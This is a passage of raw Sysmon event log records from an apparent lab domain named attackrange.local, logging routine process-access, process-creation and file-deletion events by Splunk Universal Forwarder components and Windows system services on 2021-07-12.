Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808282Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.862{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5A8-60EB-9079-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808281Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.847{0C1E0330-F5A8-60EB-9079-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808280Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1200A32A9A5A0875414D4D20A0CC86DC,SHA256=C6880F28AF8EA12842F6AA910C01153E4E2C54F7D6F440488233C89C6CD4A96A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808279Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.472{0C1E0330-F5A8-60EB-8F79-00000000D001}23723580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808278Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.315{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5A8-60EB-8F79-00000000D001}2372C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808277Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.315{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808276Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:24.315{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808275Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808274Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808273Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808272Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808271Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808270Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808269Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808268Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F5A8-60EB-8F79-00000000D001}2372C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808267Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.299{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5A8-60EB-8F79-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808266Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.300{0C1E0330-F5A8-60EB-8F79-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000808310Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.721{0C1E0330-F5A9-60EB-9179-00000000D001}9002768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000808309Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.643{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB8829621A7ACF9ED2B69F896234674F,SHA256=11CFEC1316833B26DBFD190EDC6D800B88154A9E99D4FBE23C4E8CDE9438BBF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:25.643{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D3BE8B055691F5BBCD7FC876F8C4BEA,SHA256=55974BFD5E01E53710DBA4517B81ADFCB9D337A73B11065293D986CBE600DF1B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808308Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5A9-60EB-9179-00000000D001}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808307Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808306Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808305Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808304Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808303Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808302Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:25.549{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808301Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 